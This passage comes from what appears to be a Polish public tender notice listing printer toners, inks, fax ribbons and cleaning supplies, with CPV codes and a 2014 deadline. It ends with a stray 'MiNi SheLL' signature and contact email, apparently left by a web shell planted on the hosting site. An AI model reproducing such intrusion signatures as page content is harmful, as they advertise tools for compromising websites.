47.	toner do drukarki Kyocera FS-1035 MFP TK-1140 oryginał 	2 szt. 
48.	toner do drukarki Kyocera FS-1035 MFP TK-1140  zamiennik, wydajność nie mniejsza niż oryginalny	10 szt.
49.	toner Kyocera FS-1320 D toner TK -170 czarny oryginalny 	2 szt.
50.	toner do drukarki Kyocera FS-1320 D toner TK -170 zamiennik, wydajność nie mniejsza niż oryginalny	10 szt.
51.	toner do drukarki EPSON Black Aculaser M 1200 oryginalny	2 szt.
52.	toner do drukarki EPSON Black Aculaser M 1200 zamiennik, wydajność nie mniejsza niż oryginalny 	4 szt.
53.	tusz do drukarki Epson Stylus SX 410 - oryginalny /czarny-7,4 ml/ 	30 szt.
54.	tusz do drukarki Epson Stylus SX 410 - oryginalny żółty - 5,5 ml/	20 szt.
55.	tusz do drukarki Epson Stylus SX 410 - oryginalny purpurowy- 5,5 ml/	20 szt.
56.	tusz do drukarki Epson Stylus SX 410 - oryginalny niebieski  - 5,5 ml/	20 szt.
57.	toner do drukarki Epson AcuLaser M2000 - oryginalny /czarny/	9 szt.
58.	toner do drukarki OKI B 410DN/430/440 oryginalny /3.500 stron/	4 szt.
59.	toner do drukarki OKI Laser B411/431  /3.000 stron/ oryginał 	6 szt.
60.	toner  do drukarki OKI C810 - oryginalny czarny/8.000 stron/	2 szt.
61.	toner  do drukarki OKI C 810 - oryginalny niebieski /8.000 stron/	2 szt.
62.	toner  do drukarki OKI C 810 - oryginalny purpurowy /8.000 stron/	2 szt.
63.	toner  do drukarki OKI C 810 - oryginalny  żółty /8.000 stron/	2 szt.
64.	toner do drukarki  RICOH SPC 232 dn oryginalny czarny	3 szt.
65.	toner do drukarki RICOH SPC 232 dn  CYAN 406480 oryginalny	2 szt.
66.	toner do drukarki RICOH SPC 232 dn MAGENTA 406481 oryginalny	2 szt.
67.	toner do drukarki RICOH SPC 232 dn YELLOW 406482 oryginalny	2 szt.
68.	toner do drukarki RICOH AF SPC 310/311 dn oryginalny czarny /6.500 stron/	5 szt.
69.	toner do drukarki RICOH AF SPC 310/311 dn oryginalny  niebieski /6.000 stron)	3 szt.
70.	toner do drukarki RICOH AF SPC 310/311 dn oryginalny  purpurowy /6.000 stron/	3 szt.
71.	toner do drukarki RICOH AF SPC 310/311 dn oryginalny  żółty /6.000 stron/	3 szt.
72.	toner NASHUATEC AF SPC 430 dn BLACK oryginalny	4 szt.
73.	toner  NASHUATEC AF SPC 430 dn MAGENTA oryginalny	2 szt.
74.	toner  NASHUATEC AF SPC 430 dn YELLOW oryginalny	2 szt.
75.	toner NASHUATEC AF SPC 430 dn CYAN oryginalny	2 szt.
76.	toner do kserokopiarki Olivetti d-Copia 200MF - oryginalny /15.000 kopii/	2 szt.
77.	toner do kserokopiarki Olivetti 1600 d-Copia - oryginał /15.000 kopii/	2 szt.
78.	toner do kserokopiarki Olivetti d-Copia 1800MF/2200 - oryginalny /15.000 kopii/ 	2 szt.
79.	toner do drukarki Olivetti d-Copia 3504 MF toner B 1011 /7.200 kopii/  oryginalny 	2 szt.
80.	toner do drukarki Olivetti d-Copia 3504 MF zamiennik, wydajność nie mniejsza niż oryginalny	6szt.
81.	toner do drukarki Olivetti d-copia 938 MF /15.000 kopii/ oryginał 	2 szt.
82.	toner do drukarki Olivetti d-copia 938 MF zamiennik, wydajność nie mniejsza niż oryginalny 	2 szt.
83.	toner do KIP 3000   2 x 300 g - oryginał	1szt.
84.	Toner do kserokopiarki Konica Minolta Customer Support bizhub 363 - toner type tn 414 czarny - oryginał	3 szt.
85.	taśma do faxu Panasonic KX-FC 278 A/2 -oryginał 	2 szt.
86.	taśma do faxu Panasonic KX-FC 278 A/2 -zamiennik, wydajność nie mniejsza niż oryginalny	4 szt.
87.	spray do czyszczenia monitorów TFT/LCD 250 ml	6 szt.
88.	powietrze sprężone w sprayu	6 szt.
89.	pianka do czyszczenia obudowy, klawiatury 	6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com